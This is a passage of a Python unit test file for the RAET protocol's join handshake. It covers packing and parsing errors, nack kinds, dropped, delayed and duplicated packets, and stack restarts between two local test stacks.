self.serviceStacks([alpha], duration=0.1) # handle and respond
raeting.UDP_MAX_PACKET_SIZE = default_size
# Checks
self.assertIn('packing_error', alpha.stats)
self.assertEqual(alpha.stats['packing_error'], 1)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentAckAcceptErrorPack(self):
'''
Test joinent.ackAccept packet.pack error (coverage)
'''
console.terse("{0}\n".format(self.testJoinentAckAcceptErrorPack.__doc__))
alpha, beta = self.bootstrapJoinedRemotes()
# Test
beta.join()
self.serviceStacks([beta], duration=0.1) # send join
default_size = raeting.UDP_MAX_PACKET_SIZE
raeting.UDP_MAX_PACKET_SIZE = 10 # packet.pack() will throw PacketError
self.serviceStacks([alpha], duration=0.1) # handle and respond
raeting.UDP_MAX_PACKET_SIZE = default_size
# Checks
self.assertIn('packing_error', alpha.stats)
self.assertEqual(alpha.stats['packing_error'], 1)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentAckAcceptIncorrectKind(self):
'''
Test joinent.ackAccept incorrect kind (coverage)
'''
console.terse("{0}\n".format(self.testJoinentAckAcceptIncorrectKind.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapJoinedRemotes()
alpha.clearStats()
console.terse("\nTest joinent ackAccept missing kind *********\n")
# stack join
alpha.kind = -1
self.join(beta, alpha, duration=10.0)
self.assertIn('joinent_transaction_failure', alpha.stats) # Error occured
self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentPendErrorParseInner(self):
'''
Test joinent.pend handles parseInner error (coverage)
'''
console.terse("{0}\n".format(self.testJoinentPendErrorParseInner.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapJoinedRemotes()
beta.keep.auto = raeting.AutoMode.never.value
# Test:
beta.clearStats()
console.terse("\nTest joinent pend parseInner error *********\n")
beta.join() # Join
self.serviceStacks([beta], duration=0.1) # beta send join
self.serviceStacks([alpha], duration=0.1) # alpha read responce, send ack
# Pend from beta to alpha with broken data
beta.serviceReceives()
raw, sa = beta.rxes.popleft()
console.verbose("{0} received packet\n{1}\n".format(beta.name, raw))
packet = packeting.RxPacket(stack=beta, packed=raw)
packet.parseOuter()
sh, sp = sa
packet.data.update(sh=sh, sp=sp)
self.assertEqual(len(beta.transactions), 1)
joiner = beta.transactions[0]
joiner.rxPacket = packet
# Break packet Inner
joiner.txData['ck'] = -1
joiner.ackPend() # Pend
self.serviceStacks([beta], duration=0.1) # send join
self.serviceStacks([alpha], duration=0.1) # read join, handle
self.assertIn('parsing_inner_error', alpha.stats) # Error occured
self.assertEqual(alpha.stats['parsing_inner_error'], 1)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentCompleteErrorParseInner(self):
'''
Test joinent.complete handles parseInner error (coverage)
'''
console.terse("{0}\n".format(self.testJoinentCompleteErrorParseInner.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapJoinedRemotes()
# Test:
beta.clearStats()
console.terse("\nTest joinent complete parseInner error *********\n")
beta.join() # Join
self.serviceStacks([beta], duration=0.1) # beta send join
self.serviceStacks([alpha], duration=0.1) # alpha read responce, send ack
# Complete from beta to alpha with broken data
beta.serviceReceives()
raw, sa = beta.rxes.popleft()
console.verbose("{0} received packet\n{1}\n".format(beta.name, raw))
packet = packeting.RxPacket(stack=beta, packed=raw)
packet.parseOuter()
sh, sp = sa
packet.data.update(sh=sh, sp=sp)
self.assertEqual(len(beta.transactions), 1)
joiner = beta.transactions[0]
joiner.rxPacket = packet
# Break packet Inner
joiner.txData['ck'] = -1
joiner.ackAccept() # Complete
self.serviceStacks([beta], duration=0.1) # send join
self.serviceStacks([alpha], duration=0.1) # read join, handle
self.assertIn('parsing_inner_error', alpha.stats) # Error occured
self.assertEqual(alpha.stats['parsing_inner_error'], 1)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentRejectErrorParseInner(self):
'''
Test joinent.reject handles parseInner error (coverage)
'''
console.terse("{0}\n".format(self.testJoinentRejectErrorParseInner.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapJoinedRemotes()
# Test:
beta.clearStats()
console.terse("\nTest joinent reject parseInner error *********\n")
beta.join() # Join
self.serviceStacks([beta], duration=0.1) # beta send join
self.serviceStacks([alpha], duration=0.1) # alpha read responce, send ack
# Complete from beta to alpha with broken data
beta.serviceReceives()
raw, sa = beta.rxes.popleft()
console.verbose("{0} received packet\n{1}\n".format(beta.name, raw))
packet = packeting.RxPacket(stack=beta, packed=raw)
packet.parseOuter()
sh, sp = sa
packet.data.update(sh=sh, sp=sp)
self.assertEqual(len(beta.transactions), 1)
joiner = beta.transactions[0]
joiner.rxPacket = packet
# Break packet Inner
joiner.txData['ck'] = -1
joiner.nack(kind=raeting.PcktKind.reject.value) # Reject
self.serviceStacks([beta], duration=0.1) # send join
self.serviceStacks([alpha], duration=0.1) # read join, handle
self.assertIn('parsing_inner_error', alpha.stats) # Error occured
self.assertEqual(alpha.stats['parsing_inner_error'], 1)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentRefuseErrorParseInner(self):
'''
Test joinent.refuse handles parseInner error (coverage)
'''
console.terse("{0}\n".format(self.testJoinentRefuseErrorParseInner.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapJoinedRemotes()
# Test:
beta.clearStats()
console.terse("\nTest joinent refuse parseInner error *********\n")
beta.join() # Join
self.serviceStacks([beta], duration=0.1) # beta send join
self.serviceStacks([alpha], duration=0.1) # alpha read responce, send ack
# Complete from beta to alpha with broken data
beta.serviceReceives()
raw, sa = beta.rxes.popleft()
console.verbose("{0} received packet\n{1}\n".format(beta.name, raw))
packet = packeting.RxPacket(stack=beta, packed=raw)
packet.parseOuter()
sh, sp = sa
packet.data.update(sh=sh, sp=sp)
self.assertEqual(len(beta.transactions), 1)
joiner = beta.transactions[0]
joiner.rxPacket = packet
# Break packet Inner
joiner.txData['ck'] = -1
joiner.nack(kind=raeting.PcktKind.refuse.value) # Refuse
self.serviceStacks([beta], duration=0.1) # send join
self.serviceStacks([alpha], duration=0.1) # read join, handle
self.assertIn('parsing_inner_error', alpha.stats) # Error occured
self.assertEqual(alpha.stats['parsing_inner_error'], 1)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentNackErrorPack(self):
'''
Test joinent.nack handles packet.pack error (coverage)
'''
console.terse("{0}\n".format(self.testJoinentNackErrorPack.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapJoinedRemotes()
# Test goal; Nack from joinent side
# Test conditions: vacuous join to non-main joinent
alpha.remotes.values()[0].fuid = 0 # vacuous
# Test:
alpha.clearStats()
console.terse("\nTest joinent nack packet pack error *********\n")
alpha.join() # Join
self.serviceStacks([alpha], duration=0.1) # alpha send join
# Update max packet size to make packet.pack fail
default_size = raeting.UDP_MAX_PACKET_SIZE
raeting.UDP_MAX_PACKET_SIZE = 10 # packet.pack() will throw PacketError
self.serviceStacks([beta], duration=0.1) # beta read responce, nack
raeting.UDP_MAX_PACKET_SIZE = default_size
self.assertIn('packing_error', beta.stats)
self.assertEqual(beta.stats['packing_error'], 1)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentNackRenew(self):
'''
Test joiner.nack with 'renew' kind (coverage)
'''
console.terse("{0}\n".format(self.testJoinentNackRenew.__doc__))
alpha, beta = self.bootstrapJoinedRemotes()
alpha.clearStats()
beta.join()
self.serviceStacks([beta], duration=0.1) # request join
self.serviceStacks([alpha], duration=0.1) # handle, responce
self.assertEqual(len(alpha.transactions), 1)
alpha.transactions[0].nack(kind=raeting.PcktKind.renew.value)
# Checks
self.assertIn('joinent_transaction_failure', alpha.stats)
self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentNackUnknown(self):
'''
Test joiner.nack with 'unknown' kind (cover 'else' case) (coverage)
'''
console.terse("{0}\n".format(self.testJoinentNackUnknown.__doc__))
alpha, beta = self.bootstrapJoinedRemotes()
alpha.clearStats()
beta.join()
self.serviceStacks([beta], duration=0.1) # request join
self.serviceStacks([alpha], duration=0.1) # handle, responce
self.assertEqual(len(alpha.transactions), 1)
alpha.transactions[0].nack(kind=raeting.PcktKind.unknown.value)
# Checks
self.assertIn('joinent_transaction_failure', alpha.stats)
self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testFirstJoinRequestDropped(self):
'''
Test network dropped first join request (redo timeout)
'''
console.terse("{0}\n".format(self.testFirstJoinRequestDropped.__doc__))
alpha, beta = self.bootstrapJoinedRemotes()
stacks = [alpha, beta]
for stack in stacks:
stack.remotes.values()[0].joined = None # force unjoin both
stack.clearStats()
console.terse("\nTest joinent didn't received first packet, redo timeout *********\n")
beta.join() # join from beta to alpha
self.serviceStacks([beta], duration=0.1) # send alive
self.flushReceives(alpha)
self.serviceStacks(stacks, duration=2.0) # timeout, redo, alive
self.assertIn('joiner_tx_join_redo', beta.stats)
self.assertEqual(beta.stats['joiner_tx_join_redo'], 1) # 1 redo
for stack in stacks:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
remote = stack.remotes.values()[0]
self.assertTrue(remote.joined)
for stack in stacks:
stack.server.close()
stack.clearAllKeeps()
def testAllJoinRequestsDropped(self):
'''
Test network dropped all join requests (transaction timeout)
'''
console.terse("{0}\n".format(self.testAllJoinRequestsDropped.__doc__))
alpha, beta = self.bootstrapJoinedRemotes()
stacks = [alpha, beta]
for stack in stacks:
stack.remotes.values()[0].joined = None # force unjoin both
stack.clearStats()
console.terse("\nTest joinent didn't received any request, transaction timeout *********\n")
beta.join() # join from beta to alpha
self.serviceStacksDropRx(stacks, drop=[alpha], duration=10.0) # redo timeout, transaction timeout, drop
self.assertIn('joiner_tx_join_redo', beta.stats)
self.assertEqual(beta.stats['joiner_tx_join_redo'], 2) # 2 redo
for stack in stacks:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
remote = stack.remotes.values()[0]
self.assertIsNone(remote.joined)
for stack in stacks:
stack.server.close()
stack.clearAllKeeps()
def testFirstJoinAcceptDropped(self):
'''
Test network dropped first join ack response (redo timeout)
'''
console.terse("{0}\n".format(self.testFirstJoinAcceptDropped.__doc__))
alpha, beta = self.bootstrapJoinedRemotes()
stacks = [alpha, beta]
for stack in stacks:
stack.remotes.values()[0].joined = None # force unjoin both
stack.clearStats()
console.terse("\nTest joiner didn't received first accept, redo timeout *********\n")
beta.join() # join from beta to alpha
self.serviceStacks([beta], duration=0.1) # beta: send join
self.serviceStacks([alpha], duration=0.1) # alpha: process join, send ack
self.flushReceives(beta)
self.serviceStacks(stacks, duration=2.0) # alpha: timeout, redo ack
self.assertIn('joinent_tx_accept_redo', alpha.stats)
self.assertEqual(alpha.stats['joinent_tx_accept_redo'], 1) # 1 redo
for stack in stacks:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
remote = stack.remotes.values()[0]
self.assertTrue(remote.joined)
for stack in stacks:
stack.server.close()
stack.clearAllKeeps()
def testAllJoinAcceptDropped(self):
'''
Test network dropped all join accepts (transaction timeout)
'''
console.terse("{0}\n".format(self.testAllJoinAcceptDropped.__doc__))
alpha, beta = self.bootstrapJoinedRemotes()
stacks = [alpha, beta]
for stack in stacks:
stack.remotes.values()[0].joined = None # force unjoin both
stack.clearStats()
console.terse("\nTest joiner didn't received any accept, transaction timeout *********\n")
beta.join() # join from beta to alpha
self.serviceStacksDropRx(stacks, drop=[beta], duration=10.0) # both ends timed out, drop transactions
self.assertIn('joiner_tx_join_redo', beta.stats)
self.assertEqual(beta.stats['joiner_tx_join_redo'], 2) # 2 redo
self.assertIn('duplicate_join_attempt', alpha.stats)
self.assertEqual(alpha.stats['duplicate_join_attempt'], 2) # 2 redo join received
self.assertIn('joinent_tx_accept_redo', alpha.stats)
self.assertEqual(alpha.stats['joinent_tx_accept_redo'], 5) # 5 redo accept
for stack in stacks:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
remote = stack.remotes.values()[0]
self.assertIsNone(remote.joined)
for stack in stacks:
stack.server.close()
stack.clearAllKeeps()
def testFirstJoinAckAcceptDropped(self):
'''
Test network dropped first join ack accept response (redo timeout, stale refuse)
'''
console.terse("{0}\n".format(self.testFirstJoinAckAcceptDropped.__doc__))
alpha, beta = self.bootstrapJoinedRemotes()
stacks = [alpha, beta]
for stack in stacks:
stack.remotes.values()[0].joined = None # force unjoin both
stack.clearStats()
console.terse("\nTest joinent didn't received ack accept, redo timeout *********\n")
beta.join() # join from beta to alpha
self.serviceStacks([beta], duration=0.1) # beta: send join
self.serviceStacks([alpha], duration=0.1) # alpha: process join, send ack
self.serviceStacks([beta], duration=0.1) # beta: send ack accept, remove
self.flushReceives(alpha)
self.serviceStacks(stacks, duration=2.0) # alpha: timeout, redo ack; beta: stale, refuse
self.serviceStacks(stacks, duration=2.0) # alpha: timeout, redo ack; beta: stale, refuse
self.assertIn('stale_correspondent_nack', beta.stats)
self.assertEqual(beta.stats['stale_correspondent_nack'], 1) # 1 stale refuse
self.assertIn('joinent_tx_accept_redo', alpha.stats)
self.assertEqual(alpha.stats['joinent_tx_accept_redo'], 1) # 1 redo
self.assertIn('joinent_rx_nack', alpha.stats)
self.assertEqual(alpha.stats['joinent_rx_nack'], 1) # 1 redo
for stack in stacks:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertTrue(beta.remotes.values()[0].joined)
self.assertIsNone(alpha.remotes.values()[0].joined)
for stack in stacks:
stack.server.close()
stack.clearAllKeeps()
def testAllJoinAckAcceptDropped(self):
'''
Test network dropped all join ack accepts (transaction timeout)
'''
console.terse("{0}\n".format(self.testAllJoinAckAcceptDropped.__doc__))
alpha, beta = self.bootstrapJoinedRemotes()
stacks = [alpha, beta]
for stack in stacks:
stack.remotes.values()[0].joined = None # force unjoin both
stack.clearStats()
console.terse("\nTest joinent didn't received any ack accept, transaction timeout *********\n")
beta.join() # join from beta to alpha
self.serviceStacks([beta], duration=0.1) # beta: send join
self.serviceStacks([alpha], duration=0.1) # alpha: process join, send ack
self.serviceStacks([beta], duration=0.1) # beta: send ack accept, remove
self.serviceStacksDropRx(stacks, drop=[alpha], duration=10.0)
# alpha: redo timeout, transaction timeout, drop
# beta: nack refuse since transaction is already removed
self.assertIn('stale_correspondent_nack', beta.stats)
self.assertEqual(beta.stats['stale_correspondent_nack'], 5) # 5 redo received
self.assertIn('joinent_tx_accept_redo', alpha.stats)
self.assertEqual(alpha.stats['joinent_tx_accept_redo'], 5) # 5 redo accept
for stack in stacks:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertTrue(beta.remotes.values()[0].joined)
self.assertIsNone(alpha.remotes.values()[0].joined)
for stack in stacks:
stack.server.close()
stack.clearAllKeeps()
def testFirstJoinRequestDelayed(self):
'''
Test network delayed request so ack has been received after redo was sent.
'''
console.terse("{0}\n".format(self.testFirstJoinRequestDelayed.__doc__))
alpha, beta = self.bootstrapJoinedRemotes()
stacks = [alpha, beta]
for stack in stacks:
stack.remotes.values()[0].joined = None # force unjoin both
stack.clearStats()
console.terse("\nTest joinent received both request and redo *********\n")
beta.join() # join from beta to alpha
self.serviceStacks([beta], duration=1.5) # send join and redo
self.serviceStacks(stacks) # service delayed messages
self.assertIn('joiner_tx_join_redo', beta.stats)
self.assertEqual(beta.stats['joiner_tx_join_redo'], 1) # 1 redo
self.assertIn('duplicate_join_attempt', alpha.stats)
self.assertEqual(alpha.stats['duplicate_join_attempt'], 1) # 1 duplicate on alpha
for stack in stacks:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
remote = stack.remotes.values()[0]
self.assertTrue(remote.joined)
for stack in stacks:
stack.server.close()
stack.clearAllKeeps()
def testAllJoinRequestsDelayed(self):
'''
Test network delayed all join requests (joiner receive response after transaction dropped)
'''
console.terse("{0}\n".format(self.testAllJoinRequestsDelayed.__doc__))
alpha, beta = self.bootstrapJoinedRemotes()
stacks = [alpha, beta]
for stack in stacks:
stack.remotes.values()[0].joined = None # force unjoin both
stack.clearStats()
console.terse("\nTest joiner received ack after transaction timeout *********\n")
beta.join() # join from beta to alpha
self.serviceStacks([beta], duration=10.0) # redo timeout, packet timeout, drop
self.serviceStacks(stacks) # alpha: 1 ack, 2 drop; beta: stale nack; alpha: refuse
for stack in stacks:
self.assertEqual(len(stack.txes), 0) # ensure both stacks done
self.assertIn('joiner_tx_join_redo', beta.stats)
self.assertEqual(beta.stats['joiner_tx_join_redo'], 2) # 2 redo
self.assertIn('stale_correspondent_attempt', beta.stats)
self.assertEqual(beta.stats['stale_correspondent_attempt'], 1) # 1 stale attempt
self.assertIn('stale_correspondent_nack', beta.stats)
self.assertEqual(beta.stats['stale_correspondent_nack'], 1) # 1 stale nack answer
self.assertIn('duplicate_join_attempt', alpha.stats)
self.assertEqual(alpha.stats['duplicate_join_attempt'], 2) # 2 redo
self.assertIn('joinent_rx_nack', alpha.stats)
self.assertEqual(alpha.stats['joinent_rx_nack'], 1) # 1 stale nack on other
for stack in stacks:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
remote = stack.remotes.values()[0]
self.assertIsNone(remote.joined)
for stack in stacks:
stack.server.close()
stack.clearAllKeeps()
def testFirstJoinAcceptDelayed(self):
'''
Test network delayed response so it has been received after redo.
'''
console.terse("{0}\n".format(self.testFirstJoinAcceptDelayed.__doc__))
alpha, beta = self.bootstrapJoinedRemotes()
stacks = [alpha, beta]
for stack in stacks:
stack.remotes.values()[0].joined = None # force unjoin both
stack.clearStats()
console.terse("\nTest joiner received both accept and redo *********\n")
beta.join() # join from beta to alpha
self.serviceStacks([beta], duration=0.1) # send join
self.serviceStacks([alpha], duration=0.2) # send ack and redo
self.serviceStacks(stacks) # service delayed messages
self.assertIn('stale_correspondent_nack', beta.stats)
self.assertEqual(beta.stats['stale_correspondent_nack'], 1) # 1 stale refuse
self.assertIn('joinent_tx_accept_redo', alpha.stats)
self.assertEqual(alpha.stats['joinent_tx_accept_redo'], 1) # 1 redo
for stack in stacks:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
remote = stack.remotes.values()[0]
self.assertTrue(remote.joined)
for stack in stacks:
stack.server.close()
stack.clearAllKeeps()
def testAllJoinAcceptsDelayed(self):
'''
Test network delayed all join accepts (joinent receive ack accept after transaction dropped)
'''
console.terse("{0}\n".format(self.testAllJoinAcceptsDelayed.__doc__))
alpha, beta = self.bootstrapJoinedRemotes()
stacks = [alpha, beta]
for stack in stacks:
stack.remotes.values()[0].joined = None # force unjoin both
stack.clearStats()
console.terse("\nTest joinent received ack accept after transaction timeout *********\n")
beta.join() # join from beta to alpha
self.serviceStacks([beta], duration=0.1) # send join
self.serviceStacks([alpha], duration=10.0) # alpha: redo, remove
self.serviceStacks(stacks)
for stack in stacks:
self.assertEqual(len(stack.txes), 0) # ensure both stacks done
self.assertIn('stale_correspondent_nack', beta.stats)
self.assertEqual(beta.stats['stale_correspondent_nack'], 5) # 5 stale nack answer
self.assertIn('joinent_tx_accept_redo', alpha.stats)
self.assertEqual(alpha.stats['joinent_tx_accept_redo'], 5) # 5 redo
for stack in stacks:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertIsNone(alpha.remotes.values()[0].joined)
self.assertTrue(beta.remotes.values()[0].joined)
for stack in stacks:
stack.server.close()
stack.clearAllKeeps()
def testJoinRequestDuplicated(self):
'''
Test network duplicated join request (joiner ack both, joinent drop second)
'''
console.terse("{0}\n".format(self.testJoinRequestDuplicated.__doc__))
alpha, beta = self.bootstrapJoinedRemotes()
stacks = [alpha, beta]
for stack in stacks:
stack.remotes.values()[0].joined = None # force unjoin both
stack.clearStats()
console.terse("\nTest joiner received the same request twice *********\n")
beta.join() # join from beta to alpha
self.serviceStacks([beta], duration=0.1) # send join
self.dupReceives(alpha)
self.serviceStacks(stacks) # beta: 1 req; alpha: 1 ack, 1 drop; beta: ack
self.assertIn('duplicate_join_attempt', alpha.stats)
self.assertEqual(alpha.stats['duplicate_join_attempt'], 1) # 1 dup
for stack in stacks:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
remote = stack.remotes.values()[0]
self.assertTrue(remote.joined)
for stack in stacks:
stack.server.close()
stack.clearAllKeeps()
def testJoinAcceptDuplicated(self):
'''
Test network duplicated join ack response (stale nack the second one)
'''
console.terse("{0}\n".format(self.testJoinAcceptDuplicated.__doc__))
alpha, beta = self.bootstrapJoinedRemotes()
stacks = [alpha, beta]
for stack in stacks:
stack.remotes.values()[0].joined = None # force unjoin both
stack.clearStats()
console.terse("\nTest joiner received response twice *********\n")
beta.join() # join from beta to alpha
self.serviceStacks([beta], duration=0.1) # Send join
self.serviceStacks([alpha], duration=0.1) # Send ack
self.dupReceives(beta) # duplicate response
self.serviceStacks([beta, alpha]) # beta: 1st accept, 2nd stale nack
self.assertIn('stale_correspondent_attempt', beta.stats)
self.assertEqual(beta.stats['stale_correspondent_attempt'], 1) # 1 stale attempt (dup)
self.assertIn('stale_packet', alpha.stats)
self.assertEqual(alpha.stats['stale_packet'], 1) # 1 stale nack on alpha (dup)
for stack in stacks:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
remote = stack.remotes.values()[0]
self.assertTrue(remote.joined)
for stack in stacks:
stack.server.close()
stack.clearAllKeeps()
def testJoinAckAcceptDuplicated(self):
'''
Test network duplicated join ack accept (stale drop the second one)
'''
console.terse("{0}\n".format(self.testJoinAckAcceptDuplicated.__doc__))
alpha, beta = self.bootstrapJoinedRemotes()
stacks = [alpha, beta]
for stack in stacks:
stack.remotes.values()[0].joined = None # force unjoin both
stack.clearStats()
console.terse("\nTest joinent received ack accept twice *********\n")
beta.join() # join from beta to alpha
self.serviceStacks([beta], duration=0.1) # Send join
self.serviceStacks([alpha], duration=0.1) # Send ack
self.serviceStacks([beta], duration=0.1) # Send ack accept
self.dupReceives(alpha) # duplicate response
self.serviceStacks(stacks) # alpha: 1st accept, 2nd stale drop
self.assertIn('stale_packet', alpha.stats)
self.assertEqual(alpha.stats['stale_packet'], 1) # 1 stale drop on alpha (dup)
for stack in stacks:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
remote = stack.remotes.values()[0]
self.assertTrue(remote.joined)
for stack in stacks:
stack.server.close()
stack.clearAllKeeps()
def testJoinerRestartNothingTransmitted(self):
'''
Test joiner dies before the message is transmitted (die)
'''
console.terse("{0}\n".format(self.testJoinerRestartNothingTransmitted.__doc__))
alpha, beta = self.bootstrapJoinedRemotes()
stacks = [alpha, beta]
for stack in stacks:
stack.remotes.values()[0].joined = None # force unjoin both
stack.clearStats()
console.terse("\nSend join request *********\n")
beta.join() # join from beta to alpha
console.terse("\nRestart beta *********\n")
# shutdown beta
beta.server.close()
beta.clearAllKeeps()
beta, betaData = self.bootstrapStack(name='beta', ha=('', raeting.RAET_TEST_PORT), auto=raeting.AutoMode.once.value)
stacks = [alpha, beta]
self.serviceStacks(stacks)
self.assertEqual(len(alpha.transactions), 0)
self.assertEqual(len(alpha.remotes), 1)
self.assertEqual(alpha.remotes.values()[0].joined, None)
self.assertEqual(len(beta.transactions), 0)
self.assertEqual(len(beta.remotes), 0)
console.terse("\nJoin beta again *********\n")
alpha.keep.auto = raeting.AutoMode.always.value
alpha.mutable = True
self.join(beta, alpha)
for stack in stacks:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
remote = stack.remotes.values()[0]
self.assertTrue(remote.joined)
for stack in stacks:
stack.server.close()
stack.clearAllKeeps()
def testJoinerRestartRequestTransmitted(self):
'''
Test joiner dies after a message transmitted (die)
'''
console.terse("{0}\n".format(self.testJoinerRestartRequestTransmitted.__doc__))
alpha, beta = self.bootstrapJoinedRemotes()
stacks = [alpha, beta]
for stack in stacks:
stack.remotes.values()[0].joined = None # force unjoin both
stack.clearStats()
console.terse("\nSend join request *********\n")
beta.join() # join from beta to alpha
self.serviceStacks([beta]) # transmit
console.terse("\nRestart beta *********\n")
# shutdown beta
beta.server.close()
beta.clearAllKeeps()
beta, betaData = self.bootstrapStack(name='beta', ha=('', raeting.RAET_TEST_PORT), auto=raeting.AutoMode.once.value)
stacks = [alpha, beta]
self.serviceStacks(stacks)
# transaction still alive on alpha
self.assertEqual(len(alpha.transactions), 1)
self.assertEqual(len(alpha.remotes), 1)
self.assertEqual(alpha.remotes.values()[0].joined, None)
self.assertEqual(len(beta.transactions), 0)
self.assertEqual(len(beta.remotes), 0)
console.terse("\nJoin beta again *********\n")
alpha.keep.auto = raeting.AutoMode.always.value
alpha.mutable = True
self.join(beta, alpha)
for stack in stacks:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
remote = stack.remotes.values()[0]
self.assertTrue(remote.joined)
for stack in stacks:
stack.server.close()
stack.clearAllKeeps()
def testJoinerRestartAckAcceptTransmitted(self):
'''
Test joiner dies after join done (die)
'''
console.terse("{0}\n".format(self.testJoinerRestartRequestTransmitted.__doc__))
alpha, beta = self.bootstrapJoinedRemotes()
stacks = [alpha, beta]
for stack in stacks:
stack.remotes.values()[0].joined = None # force unjoin both
stack.clearStats()
console.terse("\nSend join request *********\n")
beta.join() # join from beta to alpha
self.serviceStacks([beta]) # transmit request
self.serviceStacks([alpha]) # ack
self.serviceStacks([beta]) # ack accept
console.terse("\nRestart beta *********\n")
# shutdown beta
beta.server.close()
beta.clearAllKeeps()
beta, betaData = self.bootstrapStack(name='beta', ha=('', raeting.RAET_TEST_PORT), auto=raeting.AutoMode.once.value)
stacks = [alpha, beta]
self.serviceStacks(stacks)
self.assertEqual(len(alpha.transactions), 0)
self.assertEqual(len(alpha.remotes), 1)
self.assertTrue(alpha.remotes.values()[0].joined)
self.assertEqual(len(beta.transactions), 0)
self.assertEqual(len(beta.remotes), 0)
console.terse("\nJoin beta again *********\n")
alpha.keep.auto = raeting.AutoMode.always.value
alpha.mutable = True
self.join(beta, alpha)
for stack in stacks:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
remote = stack.remotes.values()[0]
self.assertTrue(remote.joined)
for stack in stacks:
stack.server.close()
stack.clearAllKeeps()
def testJoinentRestartBeforeAck(self):
'''
Test joinent dies before send ack (die)
'''
console.terse("{0}\n".format(self.testJoinentRestartBeforeAck.__doc__))
alpha, beta = self.bootstrapJoinedRemotes()
stacks = [alpha, beta]
for stack in stacks:
stack.remotes.values()[0].joined = None # force unjoin both
stack.clearStats()
console.terse("\nSend join request *********\n")
beta.join() # join from beta to alpha
self.serviceStacks([beta]) # transmit request
alpha.serviceAllRx() # receive and handle, not send
console.terse("\nRestart alpha *********\n")
# shutdown alpha
alpha.server.close()
alpha.clearAllKeeps()
alpha, alphaData = self.bootstrapStack(name='alpha', ha=('', raeting.RAET_PORT),
auto=raeting.AutoMode.always.value, mutable=True, main=True)
stacks = [alpha, beta]
beta.keep.auto = raeting.AutoMode.always.value
beta.mutable = True
self.serviceStacks(stacks)
for stack in stacks:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
remote = stack.remotes.values()[0]
self.assertTrue(remote.joined)
for stack in stacks:
stack.server.close()
stack.clearAllKeeps()
def testJoinentRestartAckSent(self):
'''
Test joinent dies after ack sent (die)
'''
console.terse("{0}\n".format(self.testJoinentRestartAckSent.__doc__))
alpha, beta = self.bootstrapJoinedRemotes()
stacks = [alpha, beta]
for stack in stacks:
stack.remotes.values()[0].joined = None # force unjoin both
stack.clearStats()
console.terse("\nSend join request *********\n")
beta.join() # join from beta to alpha
self.serviceStacks([beta]) # transmit request
self.serviceStacks([alpha]) # receive and handle, send ack
console.terse("\nRestart alpha *********\n")
# shutdown alpha
alpha.server.close()
alpha.clearAllKeeps()
alpha, alphaData = self.bootstrapStack(name='alpha', ha=('', raeting.RAET_PORT),
auto=raeting.AutoMode.always.value, mutable=True, main=True)
stacks = [alpha, beta]
beta.keep.auto = raeting.AutoMode.always.value
beta.mutable = True
self.serviceStacks(stacks)
self.assertEqual(len(alpha.transactions), 0)
self.assertEqual(len(alpha.remotes), 0)
self.assertEqual(len(beta.transactions), 0)
self.assertEqual(len(beta.remotes), 1)
self.assertTrue(beta.remotes.values()[0].joined)
console.terse("\nJoin beta again *********\n")
alpha.keep.auto = raeting.AutoMode.always.value
alpha.mutable = True
self.join(beta, alpha)
for stack in stacks:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
remote = stack.remotes.values()[0]
self.assertTrue(remote.joined)
for stack in stacks:
stack.server.close()
stack.clearAllKeeps()
def runOne(test):
'''
Unittest Runner
'''
test = BasicTestCase(test)
suite = unittest.TestSuite([test])
unittest.TextTestRunner(verbosity=2).run(suite)
def runSome():
'''
Unittest runner
'''
tests = []
names = [
'testJoinBasic',
'testJoinJointVacuuousMain',
'testJoinJointVacuuousMainWithMain',
'testJoinentVacuousImmutableRejectNewMain',
'testJoinentVacuousImmutableRejectNewKind',
'testJoinentVacuousImmutableRejectNewRha',
